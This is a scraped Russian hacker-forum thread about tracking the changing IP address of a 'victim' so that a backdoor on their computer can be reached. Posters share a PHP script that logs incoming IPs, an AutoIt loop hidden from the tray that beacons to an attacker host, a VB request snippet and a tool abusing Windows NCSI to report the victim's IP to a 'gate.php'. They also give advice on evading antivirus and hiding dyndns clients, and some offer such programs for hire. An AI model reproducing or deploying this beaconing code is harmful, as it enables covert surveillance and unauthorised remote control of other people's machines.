Как узнавать IP жертвы с динамичным адресом.

Discussion in 'Уязвимости' started by SKIF86, 18 Sep 2009.

  1. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    Внутренний? Кто тебе такое сказал? Зачем тебе внутресетевой айпи? о_О Он нужен только в том случае, если ты подключен к той локальной сети, к которой принадлежит твоя жертва. Тогда можно его использовать для подключения к серверной части backdoor'a. А если подключаться через и-нет, то нужен именно внешний IP.
     
  2. cheater_man

    cheater_man Member

    Joined:
    13 Nov 2009
    Messages:
    666
    Likes Received:
    44
    Reputations:
    7
    короче не парься)
    вот http://forum.antichat.ru/threadnav84364-1-10.html
    не забудь + поставить)
     
  3. Nik(rus)

    Nik(rus) Member

    Joined:
    19 Jun 2009
    Messages:
    45
    Likes Received:
    7
    Reputations:
    0
    Sams: ну иконка это не трабл)
    В начале добавляешь #NoTrayIcon
    (а про беспалевность я имел ввиду антивири)
     
  4. winlogon.exe

    winlogon.exe Active Member

    Joined:
    5 Jun 2009
    Messages:
    33
    Likes Received:
    129
    Reputations:
    13
    ERROR
     
  5. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    Твой скрин с ошибкой не грузиться. Перезалей, если можешь.
    Извиняюсь, допустил там маленькую ошибку - не поставил кавычки.

    P.S. И еще подправил режим открытия файла с "w" на "a".

    PHP:
    <?php
    $file 
    fopen("ip.txt","a");
    fwrite($file$_GET['ip']);
    fwrite($file"\r\n");
    fclose($file);
    ?>
     
    #25 Sams, 21 Nov 2009
    Last edited: 21 Nov 2009
  6. LuckyStr

    LuckyStr New Member

    Joined:
    15 Oct 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    не читал все сообщения этой темы, поэтому могу повториться.
    есть такая штука как ddclient, эта прога связываеться через определенный период с сервером и шлет ей ip, а он в свою очередь присваивает доменное имя. в таком случае обращаться к компу жертвы будешь указывая, в параметрах telnet-клиента то доменное имя, которое присвоил ей при регистрации на dyndns.com (офф.сайт), а не айпи.
    на винду ее не ставил, но на линуксе она ставиться как два пальца обо...
    обычно эта тему используют админы чтобы поднять какой-то элементарный сервер на машине с динамическим ip, в твоем случае это то что надо, и кодить не надо.

    P.S.если ты с жертвой в одной подсети и выходить в инет через один и тотже шлюз, то такая тема не прокатит
     
    #26 LuckyStr, 22 Nov 2009
    Last edited: 22 Nov 2009
  7. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    384
    Likes Received:
    115
    Reputations:
    23
    есть еще inadyn
     
    1 person likes this.
  8. winlogon.exe

    winlogon.exe Active Member

    Joined:
    5 Jun 2009
    Messages:
    33
    Likes Received:
    129
    Reputations:
    13
    [​IMG]
     
  9. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Эм...а на VB примеры есть ? Или там геморно.
     
  10. kamanch

    kamanch New Member

    Joined:
    15 Jun 2006
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Code:
    Dim objHTTP As Object   
    Set objHTTP = CreateObject("Microsoft.XMLHTTP")
    Call objHTTP.Open("GET", "http://www.ya.ru/", False)
    Call objHTTP.Send
    
     
  11. kodzero

    kodzero Banned

    Joined:
    11 May 2009
    Messages:
    42
    Likes Received:
    27
    Reputations:
    0
    Просили у мну такую прогу, если нужна стучи в асю, будет отсылать все ипы машины на твоё мыло.
     
  12. edos

    edos Member

    Joined:
    29 Aug 2005
    Messages:
    81
    Likes Received:
    18
    Reputations:
    9

    а есть такой мини скрипт на VB полностью?
     
    #32 edos, 25 Apr 2010
    Last edited: 25 Apr 2010
  13. kl0yn

    kl0yn New Member

    Joined:
    15 Dec 2008
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    динднс можно установить в невидимом режиме (убрать с трея)
     
  14. astonilya

    astonilya New Member

    Joined:
    10 Sep 2009
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Могу написать програмку пиши в icq : 444-8шесть8-181
     
  15. napas_hd

    napas_hd Member

    Joined:
    29 Dec 2008
    Messages:
    62
    Likes Received:
    17
    Reputations:
    0
    Открываешь какой-то не стандартный порт, а потом сканишь на этот порт диапазон айпи.
     
  16. vinosh

    vinosh Member

    Joined:
    29 Oct 2011
    Messages:
    74
    Likes Received:
    16
    Reputations:
    5
    Простейшее решение autoit
    Code:
    #NoTrayIcon
    While 1
      InetRead("http://HOST/path/page.php") 
      sleep 600000
    Wend
    
    ЗЫ сори за архиалогию, авось кому пригодится
     
  17. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    Просто напиши на чем-угодно меленькую прогу, которая раз в час грузит страницу из вэба :\ (твой сервер, который складирует ip в файл)

    _UPD

    оп-оп, на дату не глянул... че-то спать походу надо чаще...
     
  18. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    136
    Reputations:
    37
    Не троян ( админам)
    Писал для себя(мы все под колпаком Microsoft :) )
    Отправка IP на гейт
    Вообщем суть проги такая:
    Начиная с Vista,Windows 7 существует функция (Network Connectivity Status Indicator (NCSI)) проверки
    выхода в интернет.
    (источник: h_ttp://winreview.ru/kakim-obrazom-windows-opredelyaet-nalichie-vyxoda-v-internet/)

    так почему бы ее не использовать в своих целях.

    на сервак (сайт) заливаем gate.php
    PHP:
    <?php  $ip getenv ('REMOTE_ADDR');  
    $date=date("j F, Y, g:i a"); 
     
    $fp fopen('ip.txt''a'); 
     
    fwrite($fp,' Date and Time:' .$date' IP: ' .$ip"\n"); 
     
    fclose($fp); 
    ?> 
    [​IMG]
    1. вписываем ip сервака
    2. адрес сайта
    3. путь до гейта (dir/gate.php)
    собираем получаем .ехе
    прога прописывает это все в реестр:
    при выходе в интернет жертва не открывая браузеров подключается к нашему гейту где и оставляет свой айпишник. (gate.php можно дополнить на свое усмотрение)
    ссылка:
    тут
    исходник в архиве
    Мне кажется если отключить Яву в браузере то айпи не вычислить это плюс конечно, но тогда некоторые шеллы не работают , это минус :)
     
    #38 vasykas, 7 Dec 2012
    Last edited: 7 Jan 2013
    3 people like this.
  19. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    ШТО?! Речь идет про JavaScript? Как он вообще касается IP?

    А так плюс, программа годная.
     
  20. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    136
    Reputations:
    37
    В мозиле ставлю прокси выключаю Яву захожу сюда:
    http://whoer.net/ (в расширенный режим) моего реального IP нет
    этот сайт проверяет меня по флэш.
    А теперь вкл. прокси и яву и зайди туда же,
    в пункте DNS - прокси нажми Да и увидишь свой реальный IP
     
    #40 vasykas, 13 Dec 2012
    Last edited: 13 Dec 2012
Loading...